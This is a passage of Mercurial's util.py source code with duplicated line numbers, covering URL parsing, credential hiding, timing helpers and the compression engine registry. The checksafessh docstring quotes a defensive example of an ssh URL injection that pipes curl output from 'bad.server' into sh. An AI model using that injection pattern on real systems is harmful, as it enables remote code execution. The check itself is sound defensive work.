2695 2695 <url path: ''>
2696 2696 >>> url('#a')
2697 2697 <url path: '', fragment: 'a'>
2698 2698 >>> url('http://host/')
2699 2699 <url scheme: 'http', host: 'host', path: ''>
2700 2700 >>> url('http://host/#a')
2701 2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2702 2702
2703 2703 Only scheme:
2704 2704
2705 2705 >>> url('http:')
2706 2706 <url scheme: 'http'>
2707 2707 """
2708 2708
2709 2709 _safechars = "!~*'()+"
2710 2710 _safepchars = "/!~*'()+:\\"
2711 2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2712 2712
2713 2713 def __init__(self, path, parsequery=True, parsefragment=True):
2714 2714 # We slowly chomp away at path until we have only the path left
2715 2715 self.scheme = self.user = self.passwd = self.host = None
2716 2716 self.port = self.path = self.query = self.fragment = None
2717 2717 self._localpath = True
2718 2718 self._hostport = ''
2719 2719 self._origpath = path
2720 2720
2721 2721 if parsefragment and '#' in path:
2722 2722 path, self.fragment = path.split('#', 1)
2723 2723
2724 2724 # special case for Windows drive letters and UNC paths
2725 2725 if hasdriveletter(path) or path.startswith('\\\\'):
2726 2726 self.path = path
2727 2727 return
2728 2728
2729 2729 # For compatibility reasons, we can't handle bundle paths as
2730 2730 # normal URLS
2731 2731 if path.startswith('bundle:'):
2732 2732 self.scheme = 'bundle'
2733 2733 path = path[7:]
2734 2734 if path.startswith('//'):
2735 2735 path = path[2:]
2736 2736 self.path = path
2737 2737 return
2738 2738
2739 2739 if self._matchscheme(path):
2740 2740 parts = path.split(':', 1)
2741 2741 if parts[0]:
2742 2742 self.scheme, path = parts
2743 2743 self._localpath = False
2744 2744
2745 2745 if not path:
2746 2746 path = None
2747 2747 if self._localpath:
2748 2748 self.path = ''
2749 2749 return
2750 2750 else:
2751 2751 if self._localpath:
2752 2752 self.path = path
2753 2753 return
2754 2754
2755 2755 if parsequery and '?' in path:
2756 2756 path, self.query = path.split('?', 1)
2757 2757 if not path:
2758 2758 path = None
2759 2759 if not self.query:
2760 2760 self.query = None
2761 2761
2762 2762 # // is required to specify a host/authority
2763 2763 if path and path.startswith('//'):
2764 2764 parts = path[2:].split('/', 1)
2765 2765 if len(parts) > 1:
2766 2766 self.host, path = parts
2767 2767 else:
2768 2768 self.host = parts[0]
2769 2769 path = None
2770 2770 if not self.host:
2771 2771 self.host = None
2772 2772 # path of file:///d is /d
2773 2773 # path of file:///d:/ is d:/, not /d:/
2774 2774 if path and not hasdriveletter(path):
2775 2775 path = '/' + path
2776 2776
2777 2777 if self.host and '@' in self.host:
2778 2778 self.user, self.host = self.host.rsplit('@', 1)
2779 2779 if ':' in self.user:
2780 2780 self.user, self.passwd = self.user.split(':', 1)
2781 2781 if not self.host:
2782 2782 self.host = None
2783 2783
2784 2784 # Don't split on colons in IPv6 addresses without ports
2785 2785 if (self.host and ':' in self.host and
2786 2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2787 2787 self._hostport = self.host
2788 2788 self.host, self.port = self.host.rsplit(':', 1)
2789 2789 if not self.host:
2790 2790 self.host = None
2791 2791
2792 2792 if (self.host and self.scheme == 'file' and
2793 2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2794 2794 raise Abort(_('file:// URLs can only refer to localhost'))
2795 2795
2796 2796 self.path = path
2797 2797
2798 2798 # leave the query string escaped
2799 2799 for a in ('user', 'passwd', 'host', 'port',
2800 2800 'path', 'fragment'):
2801 2801 v = getattr(self, a)
2802 2802 if v is not None:
2803 2803 setattr(self, a, urlreq.unquote(v))
2804 2804
2805 2805 def __repr__(self):
2806 2806 attrs = []
2807 2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 2808 'query', 'fragment'):
2809 2809 v = getattr(self, a)
2810 2810 if v is not None:
2811 2811 attrs.append('%s: %r' % (a, v))
2812 2812 return '<url %s>' % ', '.join(attrs)
2813 2813
2814 2814 def __bytes__(self):
2815 2815 r"""Join the URL's components back into a URL string.
2816 2816
2817 2817 Examples:
2818 2818
2819 2819 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 2821 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2822 2822 'http://user:pw@host:80/?foo=bar&baz=42'
2823 2823 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2824 2824 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 2825 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2826 2826 'ssh://user:pw@[::1]:2200//home/joe#'
2827 2827 >>> str(url('http://localhost:80//'))
2828 2828 'http://localhost:80//'
2829 2829 >>> str(url('http://localhost:80/'))
2830 2830 'http://localhost:80/'
2831 2831 >>> str(url('http://localhost:80'))
2832 2832 'http://localhost:80/'
2833 2833 >>> str(url('bundle:foo'))
2834 2834 'bundle:foo'
2835 2835 >>> str(url('bundle://../foo'))
2836 2836 'bundle:../foo'
2837 2837 >>> str(url('path'))
2838 2838 'path'
2839 2839 >>> str(url('file:///tmp/foo/bar'))
2840 2840 'file:///tmp/foo/bar'
2841 2841 >>> str(url('file:///c:/tmp/foo/bar'))
2842 2842 'file:///c:/tmp/foo/bar'
2843 2843 >>> print url(r'bundle:foo\bar')
2844 2844 bundle:foo\bar
2845 2845 >>> print url(r'file:///D:\data\hg')
2846 2846 file:///D:\data\hg
2847 2847 """
2848 2848 if self._localpath:
2849 2849 s = self.path
2850 2850 if self.scheme == 'bundle':
2851 2851 s = 'bundle:' + s
2852 2852 if self.fragment:
2853 2853 s += '#' + self.fragment
2854 2854 return s
2855 2855
2856 2856 s = self.scheme + ':'
2857 2857 if self.user or self.passwd or self.host:
2858 2858 s += '//'
2859 2859 elif self.scheme and (not self.path or self.path.startswith('/')
2860 2860 or hasdriveletter(self.path)):
2861 2861 s += '//'
2862 2862 if hasdriveletter(self.path):
2863 2863 s += '/'
2864 2864 if self.user:
2865 2865 s += urlreq.quote(self.user, safe=self._safechars)
2866 2866 if self.passwd:
2867 2867 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 2868 if self.user or self.passwd:
2869 2869 s += '@'
2870 2870 if self.host:
2871 2871 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 2872 s += urlreq.quote(self.host)
2873 2873 else:
2874 2874 s += self.host
2875 2875 if self.port:
2876 2876 s += ':' + urlreq.quote(self.port)
2877 2877 if self.host:
2878 2878 s += '/'
2879 2879 if self.path:
2880 2880 # TODO: similar to the query string, we should not unescape the
2881 2881 # path when we store it, the path might contain '%2f' = '/',
2882 2882 # which we should *not* escape.
2883 2883 s += urlreq.quote(self.path, safe=self._safepchars)
2884 2884 if self.query:
2885 2885 # we store the query in escaped form.
2886 2886 s += '?' + self.query
2887 2887 if self.fragment is not None:
2888 2888 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 2889 return s
2890 2890
2891 2891 __str__ = encoding.strmethod(__bytes__)
2892 2892
2893 2893 def authinfo(self):
2894 2894 user, passwd = self.user, self.passwd
2895 2895 try:
2896 2896 self.user, self.passwd = None, None
2897 2897 s = bytes(self)
2898 2898 finally:
2899 2899 self.user, self.passwd = user, passwd
2900 2900 if not self.user:
2901 2901 return (s, None)
2902 2902 # authinfo[1] is passed to urllib2 password manager, and its
2903 2903 # URIs must not contain credentials. The host is passed in the
2904 2904 # URIs list because Python < 2.4.3 uses only that to search for
2905 2905 # a password.
2906 2906 return (s, (None, (s, self.host),
2907 2907 self.user, self.passwd or ''))
2908 2908
2909 2909 def isabs(self):
2910 2910 if self.scheme and self.scheme != 'file':
2911 2911 return True # remote URL
2912 2912 if hasdriveletter(self.path):
2913 2913 return True # absolute for our purposes - can't be joined()
2914 2914 if self.path.startswith(br'\\'):
2915 2915 return True # Windows UNC path
2916 2916 if self.path.startswith('/'):
2917 2917 return True # POSIX-style
2918 2918 return False
2919 2919
2920 2920 def localpath(self):
2921 2921 if self.scheme == 'file' or self.scheme == 'bundle':
2922 2922 path = self.path or '/'
2923 2923 # For Windows, we need to promote hosts containing drive
2924 2924 # letters to paths with drive letters.
2925 2925 if hasdriveletter(self._hostport):
2926 2926 path = self._hostport + '/' + self.path
2927 2927 elif (self.host is not None and self.path
2928 2928 and not hasdriveletter(path)):
2929 2929 path = '/' + path
2930 2930 return path
2931 2931 return self._origpath
2932 2932
2933 2933 def islocal(self):
2934 2934 '''whether localpath will return something that posixfile can open'''
2935 2935 return (not self.scheme or self.scheme == 'file'
2936 2936 or self.scheme == 'bundle')
2937 2937
2938 2938 def hasscheme(path):
2939 2939 return bool(url(path).scheme)
2940 2940
2941 2941 def hasdriveletter(path):
2942 2942 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 2943
2944 2944 def urllocalpath(path):
2945 2945 return url(path, parsequery=False, parsefragment=False).localpath()
2946 2946
2947 2947 def checksafessh(path):
2948 2948 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949 2949
2950 2950 This is a sanity check for ssh urls. ssh will parse the first item as
2951 2951 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 2952 Let's prevent these potentially exploited urls entirely and warn the
2953 2953 user.
2954 2954
2955 2955 Raises an error.Abort when the url is unsafe.
2956 2956 """
2957 2957 path = urlreq.unquote(path)
2958 2958 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 2959 raise error.Abort(_('potentially unsafe url: %r') %
2960 2960 (path,))
2961 2961
2962 2962 def hidepassword(u):
2963 2963 '''hide user credential in a url string'''
2964 2964 u = url(u)
2965 2965 if u.passwd:
2966 2966 u.passwd = '***'
2967 2967 return bytes(u)
2968 2968
2969 2969 def removeauth(u):
2970 2970 '''remove all authentication information from a url string'''
2971 2971 u = url(u)
2972 2972 u.user = u.passwd = None
2973 2973 return str(u)
2974 2974
2975 2975 timecount = unitcountfn(
2976 2976 (1, 1e3, _('%.0f s')),
2977 2977 (100, 1, _('%.1f s')),
2978 2978 (10, 1, _('%.2f s')),
2979 2979 (1, 1, _('%.3f s')),
2980 2980 (100, 0.001, _('%.1f ms')),
2981 2981 (10, 0.001, _('%.2f ms')),
2982 2982 (1, 0.001, _('%.3f ms')),
2983 2983 (100, 0.000001, _('%.1f us')),
2984 2984 (10, 0.000001, _('%.2f us')),
2985 2985 (1, 0.000001, _('%.3f us')),
2986 2986 (100, 0.000000001, _('%.1f ns')),
2987 2987 (10, 0.000000001, _('%.2f ns')),
2988 2988 (1, 0.000000001, _('%.3f ns')),
2989 2989 )
2990 2990
2991 2991 _timenesting = [0]
2992 2992
2993 2993 def timed(func):
2994 2994 '''Report the execution time of a function call to stderr.
2995 2995
2996 2996 During development, use as a decorator when you need to measure
2997 2997 the cost of a function, e.g. as follows:
2998 2998
2999 2999 @util.timed
3000 3000 def foo(a, b, c):
3001 3001 pass
3002 3002 '''
3003 3003
3004 3004 def wrapper(*args, **kwargs):
3005 3005 start = timer()
3006 3006 indent = 2
3007 3007 _timenesting[0] += indent
3008 3008 try:
3009 3009 return func(*args, **kwargs)
3010 3010 finally:
3011 3011 elapsed = timer() - start
3012 3012 _timenesting[0] -= indent
3013 3013 stderr.write('%s%s: %s\n' %
3014 3014 (' ' * _timenesting[0], func.__name__,
3015 3015 timecount(elapsed)))
3016 3016 return wrapper
3017 3017
3018 3018 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3019 3019 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3020 3020
3021 3021 def sizetoint(s):
3022 3022 '''Convert a space specifier to a byte count.
3023 3023
3024 3024 >>> sizetoint('30')
3025 3025 30
3026 3026 >>> sizetoint('2.2kb')
3027 3027 2252
3028 3028 >>> sizetoint('6M')
3029 3029 6291456
3030 3030 '''
3031 3031 t = s.strip().lower()
3032 3032 try:
3033 3033 for k, u in _sizeunits:
3034 3034 if t.endswith(k):
3035 3035 return int(float(t[:-len(k)]) * u)
3036 3036 return int(t)
3037 3037 except ValueError:
3038 3038 raise error.ParseError(_("couldn't parse size: %s") % s)
3039 3039
3040 3040 class hooks(object):
3041 3041 '''A collection of hook functions that can be used to extend a
3042 3042 function's behavior. Hooks are called in lexicographic order,
3043 3043 based on the names of their sources.'''
3044 3044
3045 3045 def __init__(self):
3046 3046 self._hooks = []
3047 3047
3048 3048 def add(self, source, hook):
3049 3049 self._hooks.append((source, hook))
3050 3050
3051 3051 def __call__(self, *args):
3052 3052 self._hooks.sort(key=lambda x: x[0])
3053 3053 results = []
3054 3054 for source, hook in self._hooks:
3055 3055 results.append(hook(*args))
3056 3056 return results
3057 3057
3058 3058 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3059 3059 '''Yields lines for a nicely formatted stacktrace.
3060 3060 Skips the 'skip' last entries, then return the last 'depth' entries.
3061 3061 Each file+linenumber is formatted according to fileline.
3062 3062 Each line is formatted according to line.
3063 3063 If line is None, it yields:
3064 3064 length of longest filepath+line number,
3065 3065 filepath+linenumber,
3066 3066 function
3067 3067
3068 3068 Not be used in production code but very convenient while developing.
3069 3069 '''
3070 3070 entries = [(fileline % (fn, ln), func)
3071 3071 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3072 3072 ][-depth:]
3073 3073 if entries:
3074 3074 fnmax = max(len(entry[0]) for entry in entries)
3075 3075 for fnln, func in entries:
3076 3076 if line is None:
3077 3077 yield (fnmax, fnln, func)
3078 3078 else:
3079 3079 yield line % (fnmax, fnln, func)
3080 3080
3081 3081 def debugstacktrace(msg='stacktrace', skip=0,
3082 3082 f=stderr, otherf=stdout, depth=0):
3083 3083 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3084 3084 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3085 3085 By default it will flush stdout first.
3086 3086 It can be used everywhere and intentionally does not require an ui object.
3087 3087 Not be used in production code but very convenient while developing.
3088 3088 '''
3089 3089 if otherf:
3090 3090 otherf.flush()
3091 3091 f.write('%s at:\n' % msg.rstrip())
3092 3092 for line in getstackframes(skip + 1, depth=depth):
3093 3093 f.write(line)
3094 3094 f.flush()
3095 3095
3096 3096 class dirs(object):
3097 3097 '''a multiset of directory names from a dirstate or manifest'''
3098 3098
3099 3099 def __init__(self, map, skip=None):
3100 3100 self._dirs = {}
3101 3101 addpath = self.addpath
3102 3102 if safehasattr(map, 'iteritems') and skip is not None:
3103 3103 for f, s in map.iteritems():
3104 3104 if s[0] != skip:
3105 3105 addpath(f)
3106 3106 else:
3107 3107 for f in map:
3108 3108 addpath(f)
3109 3109
3110 3110 def addpath(self, path):
3111 3111 dirs = self._dirs
3112 3112 for base in finddirs(path):
3113 3113 if base in dirs:
3114 3114 dirs[base] += 1
3115 3115 return
3116 3116 dirs[base] = 1
3117 3117
3118 3118 def delpath(self, path):
3119 3119 dirs = self._dirs
3120 3120 for base in finddirs(path):
3121 3121 if dirs[base] > 1:
3122 3122 dirs[base] -= 1
3123 3123 return
3124 3124 del dirs[base]
3125 3125
3126 3126 def __iter__(self):
3127 3127 return iter(self._dirs)
3128 3128
3129 3129 def __contains__(self, d):
3130 3130 return d in self._dirs
3131 3131
3132 3132 if safehasattr(parsers, 'dirs'):
3133 3133 dirs = parsers.dirs
3134 3134
3135 3135 def finddirs(path):
3136 3136 pos = path.rfind('/')
3137 3137 while pos != -1:
3138 3138 yield path[:pos]
3139 3139 pos = path.rfind('/', 0, pos)
3140 3140
3141 3141 # compression code
3142 3142
3143 3143 SERVERROLE = 'server'
3144 3144 CLIENTROLE = 'client'
3145 3145
3146 3146 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3147 3147 (u'name', u'serverpriority',
3148 3148 u'clientpriority'))
3149 3149
3150 3150 class compressormanager(object):
3151 3151 """Holds registrations of various compression engines.
3152 3152
3153 3153 This class essentially abstracts the differences between compression
3154 3154 engines to allow new compression formats to be added easily, possibly from
3155 3155 extensions.
3156 3156
3157 3157 Compressors are registered against the global instance by calling its
3158 3158 ``register()`` method.
3159 3159 """
3160 3160 def __init__(self):
3161 3161 self._engines = {}
3162 3162 # Bundle spec human name to engine name.
3163 3163 self._bundlenames = {}
3164 3164 # Internal bundle identifier to engine name.
3165 3165 self._bundletypes = {}
3166 3166 # Revlog header to engine name.
3167 3167 self._revlogheaders = {}
3168 3168 # Wire proto identifier to engine name.
3169 3169 self._wiretypes = {}
3170 3170
3171 3171 def __getitem__(self, key):
3172 3172 return self._engines[key]
3173 3173
3174 3174 def __contains__(self, key):
3175 3175 return key in self._engines
3176 3176
3177 3177 def __iter__(self):
3178 3178 return iter(self._engines.keys())
3179 3179
3180 3180 def register(self, engine):
3181 3181 """Register a compression engine with the manager.
3182 3182
3183 3183 The argument must be a ``compressionengine`` instance.
3184 3184 """
3185 3185 if not isinstance(engine, compressionengine):
3186 3186 raise ValueError(_('argument must be a compressionengine'))
3187 3187
3188 3188 name = engine.name()
3189 3189
3190 3190 if name in self._engines:
3191 3191 raise error.Abort(_('compression engine %s already registered') %
3192 3192 name)
3193 3193
3194 3194 bundleinfo = engine.bundletype()
3195 3195 if bundleinfo:
3196 3196 bundlename, bundletype = bundleinfo
3197 3197
3198 3198 if bundlename in self._bundlenames:
3199 3199 raise error.Abort(_('bundle name %s already registered') %
3200 3200 bundlename)
3201 3201 if bundletype in self._bundletypes:
3202 3202 raise error.Abort(_('bundle type %s already registered by %s') %
3203 3203 (bundletype, self._bundletypes[bundletype]))
3204 3204
3205 3205 # No external facing name declared.
3206 3206 if bundlename:
3207 3207 self._bundlenames[bundlename] = name
3208 3208
3209 3209 self._bundletypes[bundletype] = name
3210 3210
3211 3211 wiresupport = engine.wireprotosupport()
3212 3212 if wiresupport:
3213 3213 wiretype = wiresupport.name
3214 3214 if wiretype in self._wiretypes:
3215 3215 raise error.Abort(_('wire protocol compression %s already '
3216 3216 'registered by %s') %
3217 3217 (wiretype, self._wiretypes[wiretype]))
3218 3218
3219 3219 self._wiretypes[wiretype] = name
3220 3220
3221 3221 revlogheader = engine.revlogheader()
3222 3222 if revlogheader and revlogheader in self._revlogheaders:
3223 3223 raise error.Abort(_('revlog header %s already registered by %s') %
3224 3224 (revlogheader, self._revlogheaders[revlogheader]))
3225 3225
3226 3226 if revlogheader:
3227 3227 self._revlogheaders[revlogheader] = name
3228 3228
3229 3229 self._engines[name] = engine
3230 3230
3231 3231 @property
3232 3232 def supportedbundlenames(self):
3233 3233 return set(self._bundlenames.keys())
3234 3234
3235 3235 @property
3236 3236 def supportedbundletypes(self):
3237 3237 return set(self._bundletypes.keys())
3238 3238
3239 3239 def forbundlename(self, bundlename):
3240 3240 """Obtain a compression engine registered to a bundle name.
3241 3241
3242 3242 Will raise KeyError if the bundle type isn't registered.
3243 3243
3244 3244 Will abort if the engine is known but not available.
3245 3245 """
3246 3246 engine = self._engines[self._bundlenames[bundlename]]
3247 3247 if not engine.available():
3248 3248 raise error.Abort(_('compression engine %s could not be loaded') %
3249 3249 engine.name())
3250 3250 return engine
3251 3251
3252 3252 def forbundletype(self, bundletype):
3253 3253 """Obtain a compression engine registered to a bundle type.
3254 3254
3255 3255 Will raise KeyError if the bundle type isn't registered.
3256 3256
3257 3257 Will abort if the engine is known but not available.
3258 3258 """
3259 3259 engine = self._engines[self._bundletypes[bundletype]]
3260 3260 if not engine.available():
3261 3261 raise error.Abort(_('compression engine %s could not be loaded') %
3262 3262 engine.name())
3263 3263 return engine
3264 3264
3265 3265 def supportedwireengines(self, role, onlyavailable=True):
3266 3266 """Obtain compression engines that support the wire protocol.
3267 3267
3268 3268 Returns a list of engines in prioritized order, most desired first.
3269 3269
3270 3270 If ``onlyavailable`` is set, filter out engines that can't be
3271 3271 loaded.
3272 3272 """
3273 3273 assert role in (SERVERROLE, CLIENTROLE)
3274 3274
3275 3275 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3276 3276
3277 3277 engines = [self._engines[e] for e in self._wiretypes.values()]
3278 3278 if onlyavailable:
3279 3279 engines = [e for e in engines if e.available()]
3280 3280
3281 3281 def getkey(e):
3282 3282 # Sort first by priority, highest first. In case of tie, sort
3283 3283 # alphabetically. This is arbitrary, but ensures output is
3284 3284 # stable.
3285 3285 w = e.wireprotosupport()
3286 3286 return -1 * getattr(w, attr), w.name
3287 3287
3288 3288 return list(sorted(engines, key=getkey))
3289 3289
3290 3290 def forwiretype(self, wiretype):
3291 3291 engine = self._engines[self._wiretypes[wiretype]]
3292 3292 if not engine.available():
3293 3293 raise error.Abort(_('compression engine %s could not be loaded') %
3294 3294 engine.name())
3295 3295 return engine
3296 3296
3297 3297 def forrevlogheader(self, header):
3298 3298 """Obtain a compression engine registered to a revlog header.
3299 3299
3300 3300 Will raise KeyError if the revlog header value isn't registered.
3301 3301 """
3302 3302 return self._engines[self._revlogheaders[header]]
3303 3303
3304 3304 compengines = compressormanager()
3305 3305
3306 3306 class compressionengine(object):
3307 3307 """Base class for compression engines.
3308 3308
3309 3309 Compression engines must implement the interface defined by this class.
3310 3310 """
3311 3311 def name(self):
3312 3312 """Returns the name of the compression engine.
3313 3313
3314 3314 This is the key the engine is registered under.
3315 3315
3316 3316 This method must be implemented.
3317 3317 """
3318 3318 raise NotImplementedError()
3319 3319
3320 3320 def available(self):
3321 3321 """Whether the compression engine is available.
3322 3322
3323 3323 The intent of this method is to allow optional compression engines
3324 3324 that may not be available in all installations (such as engines relying
3325 3325 on C extensions that may not be present).
3326 3326 """
3327 3327 return True
3328 3328
3329 3329 def bundletype(self):
3330 3330 """Describes bundle identifiers for this engine.
3331 3331
3332 3332 If this compression engine isn't supported for bundles, returns None.
3333 3333
3334 3334 If this engine can be used for bundles, returns a 2-tuple of strings of
3335 3335 the user-facing "bundle spec" compression name and an internal
3336 3336 identifier used to denote the compression format within bundles. To
3337 3337 exclude the name from external usage, set the first element to ``None``.
3338 3338
3339 3339 If bundle compression is supported, the class must also implement
3340 3340 ``compressstream`` and `decompressorreader``.
3341 3341
3342 3342 The docstring of this method is used in the help system to tell users
3343 3343 about this engine.
3344 3344 """
3345 3345 return None
3346 3346
3347 3347 def wireprotosupport(self):
3348 3348 """Declare support for this compression format on the wire protocol.
3349 3349
3350 3350 If this compression engine isn't supported for compressing wire
3351 3351 protocol payloads, returns None.
3352 3352
3353 3353 Otherwise, returns ``compenginewireprotosupport`` with the following
3354 3354 fields:
3355 3355
3356 3356 * String format identifier
3357 3357 * Integer priority for the server
3358 3358 * Integer priority for the client
3359 3359
3360 3360 The integer priorities are used to order the advertisement of format
3361 3361 support by server and client. The highest integer is advertised
3362 3362 first. Integers with non-positive values aren't advertised.
3363 3363
3364 3364 The priority values are somewhat arbitrary and only used for default
3365 3365 ordering. The relative order can be changed via config options.
3366 3366
3367 3367 If wire protocol compression is supported, the class must also implement
3368 3368 ``compressstream`` and ``decompressorreader``.
3369 3369 """
3370 3370 return None
3371 3371
3372 3372 def revlogheader(self):
3373 3373 """Header added to revlog chunks that identifies this engine.
3374 3374
3375 3375 If this engine can be used to compress revlogs, this method should
3376 3376 return the bytes used to identify chunks compressed with this engine.
3377 3377 Else, the method should return ``None`` to indicate it does not
3378 3378 participate in revlog compression.
3379 3379 """
3380 3380 return None
3381 3381
3382 3382 def compressstream(self, it, opts=None):
3383 3383 """Compress an iterator of chunks.
3384 3384
3385 3385 The method receives an iterator (ideally a generator) of chunks of
3386 3386 bytes to be compressed. It returns an iterator (ideally a generator)
3387 3387 of bytes of chunks representing the compressed output.
3388 3388
3389 3389 Optionally accepts an argument defining how to perform compression.
3390 3390 Each engine treats this argument differently.
3391 3391 """
3392 3392 raise NotImplementedError()
3393 3393
3394 3394 def decompressorreader(self, fh):
3395 3395 """Perform decompression on a file object.
3396 3396
3397 3397 Argument is an object with a ``read(size)`` method that returns
3398 3398 compressed data. Return value is an object with a ``read(size)`` that
3399 3399 returns uncompressed data.
3400 3400 """
3401 3401 raise NotImplementedError()
3402 3402
3403 3403 def revlogcompressor(self, opts=None):
3404 3404 """Obtain an object that can be used to compress revlog entries.
3405 3405
3406 3406 The object has a ``compress(data)`` method that compresses binary
3407 3407 data. This method returns compressed binary data or ``None`` if
3408 3408 the data could not be compressed (too small, not compressible, etc).
3409 3409 The returned data should have a header uniquely identifying this
3410 3410 compression format so decompression can be routed to this engine.
3411 3411 This header should be identified by the ``revlogheader()`` return
3412 3412 value.
3413 3413
3414 3414 The object has a ``decompress(data)`` method that decompresses
3415 3415 data. The method will only be called if ``data`` begins with
3416 3416 ``revlogheader()``. The method should return the raw, uncompressed
3417 3417 data or raise a ``RevlogError``.
3418 3418
3419 3419 The object is reusable but is not thread safe.
3420 3420 """
3421 3421 raise NotImplementedError()
3422 3422
3423 3423 class _zlibengine(compressionengine):
3424 3424 def name(self):
3425 3425 return 'zlib'
3426 3426
3427 3427 def bundletype(self):
3428 3428 """zlib compression using the DEFLATE algorithm.
3429 3429
3430 3430 All Mercurial clients should support this format. The compression
3431 3431 algorithm strikes a reasonable balance between compression ratio
3432 3432 and size.
3433 3433 """
3434 3434 return 'gzip', 'GZ'
3435 3435
3436 3436 def wireprotosupport(self):
3437 3437 return compewireprotosupport('zlib', 20, 20)
3438 3438
3439 3439 def revlogheader(self):
3440 3440 return 'x'
3441 3441
3442 3442 def compressstream(self, it, opts=None):
3443 3443 opts = opts or {}
3444 3444
3445 3445 z = zlib.compressobj(opts.get('level', -1))
3446 3446 for chunk in it:
3447 3447 data = z.compress(chunk)
3448 3448 # Not all calls to compress emit data. It is cheaper to inspect
3449 3449 # here than to feed empty chunks through generator.
3450 3450 if data:
3451 3451 yield data
3452 3452
3453 3453 yield z.flush()
3454 3454
3455 3455 def decompressorreader(self, fh):
3456 3456 def gen():
3457 3457 d = zlib.decompressobj()
3458 3458 for chunk in filechunkiter(fh):
3459 3459 while chunk:
3460 3460 # Limit output size to limit memory.
3461 3461 yield d.decompress(chunk, 2 ** 18)
3462 3462 chunk = d.unconsumed_tail
3463 3463
3464 3464 return chunkbuffer(gen())
3465 3465
3466 3466 class zlibrevlogcompressor(object):
3467 3467 def compress(self, data):
3468 3468 insize = len(data)
3469 3469 # Caller handles empty input case.
3470 3470 assert insize > 0
3471 3471
3472 3472 if insize < 44:
3473 3473 return None
3474 3474
3475 3475 elif insize <= 1000000:
3476 3476 compressed = zlib.compress(data)
3477 3477 if len(compressed) < insize:
3478 3478 return compressed
3479 3479 return None
3480 3480
3481 3481 # zlib makes an internal copy of the input buffer, doubling
3482 3482 # memory usage for large inputs. So do streaming compression
3483 3483 # on large inputs.
3484 3484 else:
3485 3485 z = zlib.compressobj()
3486 3486 parts = []
3487 3487 pos = 0
3488 3488 while pos < insize:
3489 3489 pos2 = pos + 2**20
3490 3490 parts.append(z.compress(data[pos:pos2]))
3491 3491 pos = pos2
3492 3492 parts.append(z.flush())
3493 3493
3494 3494 if sum(map(len, parts)) < insize:
3495 3495 return ''.join(parts)
3496 3496 return None
3497 3497
3498 3498 def decompress(self, data):
3499 3499 try:
3500 3500 return zlib.decompress(data)
3501 3501 except zlib.error as e:
3502 3502 raise error.RevlogError(_('revlog decompress error: %s') %
3503 3503 str(e))
3504 3504
3505 3505 def revlogcompressor(self, opts=None):
3506 3506 return self.zlibrevlogcompressor()
3507 3507
3508 3508 compengines.register(_zlibengine())
3509 3509
3510 3510 class _bz2engine(compressionengine):
3511 3511 def name(self):
3512 3512 return 'bz2'
3513 3513
3514 3514 def bundletype(self):
3515 3515 """An algorithm that produces smaller bundles than ``gzip``.
3516 3516
3517 3517 All Mercurial clients should support this format.
3518 3518
3519 3519 This engine will likely produce smaller bundles than ``gzip`` but
3520 3520 will be significantly slower, both during compression and
3521 3521 decompression.
3522 3522
3523 3523 If available, the ``zstd`` engine can yield similar or better
3524 3524 compression at much higher speeds.
3525 3525 """
3526 3526 return 'bzip2', 'BZ'
3527 3527
3528 3528 # We declare a protocol name but don't advertise by default because
3529 3529 # it is slow.
3530 3530 def wireprotosupport(self):
3531 3531 return compewireprotosupport('bzip2', 0, 0)
3532 3532
3533 3533 def compressstream(self, it, opts=None):
3534 3534 opts = opts or {}
3535 3535 z = bz2.BZ2Compressor(opts.get('level', 9))
3536 3536 for chunk in it:
3537 3537 data = z.compress(chunk)
3538 3538 if data:
3539 3539 yield data
3540 3540
3541 3541 yield z.flush()
3542 3542
3543 3543 def decompressorreader(self, fh):
3544 3544 def gen():
3545 3545 d = bz2.BZ2Decompressor()
3546 3546 for chunk in filechunkiter(fh):
3547 3547 yield d.decompress(chunk)
3548 3548
3549 3549 return chunkbuffer(gen())
3550 3550
3551 3551 compengines.register(_bz2engine())
3552 3552
3553 3553 class _truncatedbz2engine(compressionengine):
3554 3554 def name(self):
3555 3555 return 'bz2truncated'
3556 3556
3557 3557 def bundletype(self):
3558 3558 return None, '_truncatedBZ'
3559 3559
3560 3560 # We don't implement compressstream because it is hackily handled elsewhere.
3561 3561
3562 3562 def decompressorreader(self, fh):
3563 3563 def gen():
3564 3564 # The input stream doesn't have the 'BZ' header. So add it back.
3565 3565 d = bz2.BZ2Decompressor()
3566 3566 d.decompress('BZ')
3567 3567 for chunk in filechunkiter(fh):
3568 3568 yield d.decompress(chunk)
3569 3569
3570 3570 return chunkbuffer(gen())
3571 3571
3572 3572 compengines.register(_truncatedbz2engine())
3573 3573
3574 3574 class _noopengine(compressionengine):
3575 3575 def name(self):
3576 3576 return 'none'
3577 3577
3578 3578 def bundletype(self):
3579 3579 """No compression is performed.
3580 3580
3581 3581 Use this compression engine to explicitly disable compression.
3582 3582 """
3583 3583 return 'none', 'UN'
3584 3584
3585 3585 # Clients always support uncompressed payloads. Servers don't because
3586 3586 # unless you are on a fast network, uncompressed payloads can easily
3587 3587 # saturate your network pipe.
3588 3588 def wireprotosupport(self):
